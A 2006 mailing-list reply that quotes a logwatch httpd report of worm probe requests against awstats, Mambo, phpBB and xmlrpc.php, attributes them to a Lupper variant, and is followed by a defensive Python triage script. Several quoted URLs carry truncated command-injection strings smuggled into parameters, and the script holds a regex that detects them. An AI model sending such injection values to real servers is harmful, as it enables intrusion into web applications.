Security question regarding root email

Peter Gordon admin at ramshacklestudios.com
Sun Jan 1 20:33:07 UTC 2006


On Sun, 2006-01-01 at 15:37 +0200, Dotan Cohen wrote:
>  --------------------- httpd Begin ------------------------
>  Requests with error response codes
>     404 Not Found
>        /cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
>        /cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>        /favicon.ico: 32 Time(s)
>        /javascript/HM_Arrays.js: 1 Time(s)
>        /javascript/HM_ScriptDOM.js: 1 Time(s)
>        /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
>        /php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>  ---------------------- httpd End -------------------------
> [...]
>  --------------------- httpd Begin ------------------------
>  Requests with error response codes
>     403 Forbidden
>        /cgi-bin/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
>        /cgi-bin/awstats/awstats.pl?configdir=|ech ... cho%20YYY;echo|: 1 Time(s)
>     404 Not Found
>        /Forums/admin/admin_styles.php?phpbb_root_ ... cho%20YYY;echo|: 1 Time(s)
>        /Forums/admin/admin_styles.phpadmin_styles ... cho%20YYY;echo|: 1 Time(s)
>        /admin_styles.phpadmin_styles.php?phpbb_ro ... cho%20YYY;echo|: 1 Time(s)
>        /awstats/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
>        /blog/xmlrpc.php: 2 Time(s)
>        /blog/xmlsrv/xmlrpc.php: 2 Time(s)
>        /blogs/xmlsrv/xmlrpc.php: 2 Time(s)
>        /cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
>        /cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>        /drupal/xmlrpc.php: 2 Time(s)
>        /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
>        /modules/Forums/admin/admin_styles.php?php ... cho%20YYY;echo|: 1 Time(s)
>        /modules/Forums/admin/admin_styles.phpadmi ... cho%20YYY;echo|: 2 Time(s)
>        /modules/coppermine/themes/default/theme.p ... cho%20YYY;echo|: 2 Time(s)
>        /php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>        /phpgroupware/xmlrpc.php: 2 Time(s)
>        /wordpress/xmlrpc.php: 2 Time(s)
>        /xmlrpc.php: 4 Time(s)
>        /xmlrpc/xmlrpc.php: 2 Time(s)
>        /xmlsrv/xmlrpc.php: 2 Time(s)
>  ---------------------- httpd End -------------------------

As I recall, these are attempts to hijack your server using a variant of
the Lupper worm that was going around a few months back. You seem to be
running SELinux though, so you probably shouldn't be worried, as the
default targeted and strict policies of Fedora Core 3 and 4 protect
against it.  :-)
-- 
Peter Gordon (codergeek42)
GnuPG Public Key: 0xDA3634D7
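
A triage script for a report like the one quoted above, added here as an example and not part of the original thread: it groups logwatch httpd entries by the application path being probed and lists the families that drew any status other than 404. The family labels, regexes and function names are assumptions; the sample lines are copied from the quoted report.

```python
import re
from collections import defaultdict
# Sample: lines copied from the logwatch report quoted above (as truncated there).
SAMPLE = """\
Requests with error response codes
   403 Forbidden
      /cgi-bin/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
   404 Not Found
      /awstats/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
      /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
      /xmlrpc.php: 4 Time(s)
      /favicon.ico: 32 Time(s)
"""
# Hypothetical family labels, named after path components seen in the report.
FAMILIES = [(n, re.compile(p)) for n, p in [
    ("awstats configdir", r"awstats\.pl\?configdir="),
    ("xmlrpc.php", r"/xmlrpc\.php$"),
    ("mambo index2.php", r"index2\.php\?_REQUEST\[option\]"),
    ("phpBB admin_styles", r"admin_styles\.php"),
    ("coppermine theme", r"/coppermine/themes/"),
]]
STATUS_RE = re.compile(r"^(\d{3}) \w")               # e.g. "404 Not Found"
ENTRY_RE = re.compile(r"^(/.*): (\d+) Time\(s\)$")   # e.g. "/xmlrpc.php: 4 Time(s)"
SHELL_RE = re.compile(r"\|echo;|;echo\||echo%20")    # shell markers visible in the URLs

def triage(report):
    """Group logwatch httpd entries by probe family; accepts '>'-quoted text."""
    out = defaultdict(lambda: {"hits": 0, "statuses": set(), "shell": False})
    status = None
    for raw in report.splitlines():
        line = raw.lstrip("> \t").rstrip()
        if m := STATUS_RE.match(line):
            status = int(m.group(1))
        elif (m := ENTRY_RE.match(line)) and status is not None:
            path, count = m.group(1), int(m.group(2))
            family = next((n for n, rx in FAMILIES if rx.search(path)), "other")
            rec = out[family]
            rec["hits"] += count
            rec["statuses"].add(status)
            rec["shell"] |= bool(SHELL_RE.search(path))
    return dict(out)

def needs_review(result):
    """Probe families answered with something other than 404: check if that app is installed."""
    return sorted(f for f, r in result.items() if f != "other" and r["statuses"] - {404})

if __name__ == "__main__":
    for family, rec in triage(SAMPLE).items():
        print(f"{family:20} hits={rec['hits']:3} statuses={sorted(rec['statuses'])} shell={rec['shell']}")
    print("review:", needs_review(triage(SAMPLE)))
```
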